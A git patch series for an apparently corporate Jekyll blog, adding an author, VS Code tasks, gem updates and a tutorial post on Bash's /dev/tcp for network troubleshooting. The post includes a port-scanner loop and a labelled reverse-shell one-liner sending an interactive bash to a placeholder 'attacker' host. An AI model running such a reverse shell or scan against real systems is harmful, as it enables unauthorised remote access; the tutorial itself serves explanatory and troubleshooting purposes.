From 10ddc11db6fe2eff29541c7a6d2e1f486b7b03f0 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 08:50:50 +0300 Subject: [PATCH 1/7] Add stefanos to authors.yml --- _data/authors.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_data/authors.yml b/_data/authors.yml index a9baf54..f2f3321 100644 --- a/_data/authors.yml +++ b/_data/authors.yml @@ -19,3 +19,6 @@ tim_fraczak: david_suh: name: David Suh title: Software Engineer - Enterprise +stefanos_kalandaridis: + name: Stefanos Kalandaridis + title: Site Reliability Engineer From 688c00ed825c5e799469bc2ad40f01fe413beb97 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:03:27 +0000 Subject: [PATCH 2/7] Add vscode tasks for codespaces and update some packages --- .vscode/tasks.json | 25 +++++++++++++++++++++++++ Gemfile.lock | 14 +++++++------- 2 files changed, 32 insertions(+), 7 deletions(-) create mode 100644 .vscode/tasks.json diff --git a/.vscode/tasks.json b/.vscode/tasks.json new file mode 100644 index 0000000..470c22c --- /dev/null +++ b/.vscode/tasks.json @@ -0,0 +1,25 @@ +{ + "version": "2.0.0", + "tasks": [ + { + "command": "rvm install ruby-2.5.1; rvm use 2.5.1; gem install bundler:2.1.4; bundle update", + "type": "shell", + "label": "Jekyll - Install Dev Server", + "options": { + "shell": { + "args": ["--login"] + } + }, + }, + { + "command": "rvm use 2.5.1; bundle exec jekyll serve", + "type": "shell", + "label": "Jekyll - Run Dev Server", + "options": { + "shell": { + "args": ["--login"] + } + }, + }, + ] + } \ No newline at end of file diff --git a/Gemfile.lock b/Gemfile.lock index 0fb4e89..b3cea7b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,10 +1,10 @@ GEM remote: https://rubygems.org/ specs: - addressable (2.8.1) + addressable (2.8.4) public_suffix (>= 2.0.2, < 6.0) colorator (1.1.0) - concurrent-ruby (1.1.10) + concurrent-ruby (1.2.2) em-websocket (0.5.3) eventmachine (>= 0.12.9) http_parser.rb (~> 0) @@ -12,7 +12,7 @@ GEM ffi (1.15.5) forwardable-extended (2.6.0) http_parser.rb (0.8.0) - i18n (1.12.0) + i18n (1.13.0) concurrent-ruby (~> 1.0) jekyll (4.0.1) addressable (~> 2.4) @@ -41,8 +41,8 @@ GEM rexml kramdown-parser-gfm (1.1.0) kramdown (~> 2.0) - liquid (4.0.3) - listen (3.7.1) + liquid (4.0.4) + listen (3.8.0) rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) @@ -64,9 +64,9 @@ GEM terminal-table (1.8.0) unicode-display_width (~> 1.1, >= 1.1.1) thread_safe (0.3.6) - tzinfo (1.2.10) + tzinfo (1.2.11) thread_safe (~> 0.1) - tzinfo-data (1.2022.7) + tzinfo-data (1.2023.3) tzinfo (>= 1.0.0) unicode-display_width (1.8.0) wdm (0.1.1) From ad8e2ff9c861859b918d531971000c15af5421ef Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:20:14 +0000 Subject: [PATCH 3/7] Add front-matter for dev tcp post --- ...3-05-11-bash-ing-your-network-with-dev-tcp.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 _posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md new file mode 100644 index 0000000..7db8c6c --- /dev/null +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -0,0 +1,16 @@ +--- +layout: post +title: Bash-ing your network with /dev/tcp +excerpt: . +author: stefanos_kalandaridis +categories: +- troubleshooting +- networking +- security +tags: +- bash +- networking +- http +- security +--- +# TODO \ No newline at end of file From 66f8bd99eb1c9a088abac294e72969b9b5a17f29 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:28:39 +0000 Subject: [PATCH 4/7] Launch dev server on all local addresses, not just 127.0.0.1 --- .vscode/tasks.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 470c22c..527d53f 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -12,7 +12,7 @@ }, }, { - "command": "rvm use 2.5.1; bundle exec jekyll serve", + "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost", "type": "shell", "label": "Jekyll - Run Dev Server", "options": { From 1e98408195ca954f58fa13b8af3ceb49ff0de5f9 Mon Sep 17 00:00:00 2001 From: Stefanos Kalandaridis Date: Thu, 11 May 2023 11:48:00 +0300 Subject: [PATCH 5/7] Add /dev/tcp blog post --- ...5-11-bash-ing-your-network-with-dev-tcp.md | 85 ++++++++++++++++++- 1 file changed, 84 insertions(+), 1 deletion(-) diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 7db8c6c..8a77c4c 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -13,4 +13,87 @@ tags: - http - security --- -# TODO \ No newline at end of file +# bash /dev/tcp special file + +### /dev/tcp is a file descriptor of bash shell + +In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. +/dev/udp is also valid. + +[Port Scanning](#port-scanning) +[Read TCP stream](#read-tcp-stream) +[File Transfer](#file-transfer) +[Reverse Shell](#reverse-shell) +[HTTP Requests](#http-requests) + +### Port scanning +#### One of the most common uses of it is to check if a port is open in a remote host +``` +timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && echo "open" || echo "closed" +``` + +#### This can be extremely usefull in cases where a machine/container doesn't have nc, curl, wget or any other utility to check for network connection +Let's say we are in a kubernetes pod that runs on a minimal image having bash. We want to check if it can communicate with a service or if the service is actually listening on a port. +``` +kubectl exec -it svc/random-service -- bash +$ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed" +``` + +#### You can make a port scanner with a one liner (and it's pretty fast) +``` +for port in {1..8888}; do timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"; done +``` + +### Read TCP stream +#### Get the time from nist.gov +``` +cat < /dev/tcp/time.nist.gov/13 +``` + +### File Transfer +#### Sender +``` +nc -lvnp 7777 < file.txt +``` +#### Receiver +``` +cat < /dev/tcp/sender/7777 > file.txt +``` + +#### Alternatively + +#### Receiver +``` +nc -lvnp 7777 > file.txt +``` +#### Sender +``` +cat file.txt > /dev/tcp/receiver/7777 +``` + +### Reverse Shell +#### Attacker +``` +nc -lvnp 7777 +``` +#### Victim +``` +bash -c 'bash -i >& /dev/tcp/attacker/7777 0>&1' +``` + +### HTTP Requests +#### Fetching the `www.google.com` page +``` +exec 5<>/dev/tcp/www.google.com/80 +echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&5 +cat <&5 +``` + + +#### References +https://tldp.org/LDP/abs/html/devref1.html +https://w0lfram1te.com/exploring-dev-tcp \ No newline at end of file From 48b25551ce1fad9f7008923781dc8e3e1fc5789b Mon Sep 17 00:00:00 2001 From: Stefanos Kalandaridis Date: Thu, 11 May 2023 13:12:04 +0300 Subject: [PATCH 6/7] Add excerpt, fix indentaion --- ...5-11-bash-ing-your-network-with-dev-tcp.md | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 8a77c4c..5f6e1a0 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -1,7 +1,12 @@ --- layout: post title: Bash-ing your network with /dev/tcp -excerpt: . +excerpt: In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. +/dev/udp is also valid. author: stefanos_kalandaridis categories: - troubleshooting @@ -13,9 +18,7 @@ tags: - http - security --- -# bash /dev/tcp special file - -### /dev/tcp is a file descriptor of bash shell +## /dev/tcp is a file descriptor of bash shell In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. @@ -24,11 +27,11 @@ Using `/dev/tcp`, you can open a network socket and read from or write to it, si It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. /dev/udp is also valid. -[Port Scanning](#port-scanning) -[Read TCP stream](#read-tcp-stream) -[File Transfer](#file-transfer) -[Reverse Shell](#reverse-shell) -[HTTP Requests](#http-requests) +- [Port Scanning](#port-scanning) +- [Read TCP stream](#read-tcp-stream) +- [File Transfer](#file-transfer) +- [Reverse Shell](#reverse-shell) +- [HTTP Requests](#http-requests) ### Port scanning #### One of the most common uses of it is to check if a port is open in a remote host From c55afc06ef4817a36f7fd36d8b4c05c91979404a Mon Sep 17 00:00:00 2001 From: skalandaridis <79609313+skalandaridis@users.noreply.github.com> Date: Thu, 11 May 2023 10:42:09 +0000 Subject: [PATCH 7/7] Format fixing --- .vscode/tasks.json | 17 ++++++++--- ...5-11-bash-ing-your-network-with-dev-tcp.md | 30 ++++++++++--------- 2 files changed, 29 insertions(+), 18 deletions(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 527d53f..94c9502 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -7,9 +7,16 @@ "label": "Jekyll - Install Dev Server", "options": { "shell": { - "args": ["--login"] + "args": [ + "--login" + ] } }, + "problemMatcher": [], + "group": { + "kind": "test", + "isDefault": true + } }, { "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost", @@ -17,9 +24,11 @@ "label": "Jekyll - Run Dev Server", "options": { "shell": { - "args": ["--login"] + "args": [ + "--login" + ] } - }, - }, + } + } ] } \ No newline at end of file diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 5f6e1a0..b131c72 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -1,12 +1,11 @@ --- layout: post title: Bash-ing your network with /dev/tcp -excerpt: In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. +excerpt: "In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. -It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. -/dev/udp is also valid. +/dev/udp is also valid." author: stefanos_kalandaridis categories: - troubleshooting @@ -24,7 +23,6 @@ In Bash, `/dev/tcp` is a special file that allows you to establish network conne Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. -It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. /dev/udp is also valid. - [Port Scanning](#port-scanning) @@ -46,9 +44,11 @@ kubectl exec -it svc/random-service -- bash $ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed" ``` -#### You can make a port scanner with a one liner (and it's pretty fast) +#### You can make a port scanner with it (and it's pretty fast) ``` -for port in {1..8888}; do timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"; done +for port in {1..8888}; do + echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open" +done ``` ### Read TCP stream @@ -58,22 +58,23 @@ cat < /dev/tcp/time.nist.gov/13 ``` ### File Transfer -#### Sender +#### Option 1 +Sender ``` nc -lvnp 7777 < file.txt ``` -#### Receiver +Receiver ``` cat < /dev/tcp/sender/7777 > file.txt ``` -#### Alternatively +#### Option 2 -#### Receiver +Receiver ``` nc -lvnp 7777 > file.txt ``` -#### Sender +Sender ``` cat file.txt > /dev/tcp/receiver/7777 ``` @@ -97,6 +98,7 @@ cat <&5 ``` -#### References -https://tldp.org/LDP/abs/html/devref1.html -https://w0lfram1te.com/exploring-dev-tcp \ No newline at end of file + +### References +- [https://tldp.org/LDP/abs/html/devref1.html](https://tldp.org/LDP/abs/html/devref1.html) +- [https://w0lfram1te.com/exploring-dev-tcp](https://w0lfram1te.com/exploring-dev-tcp) \ No newline at end of file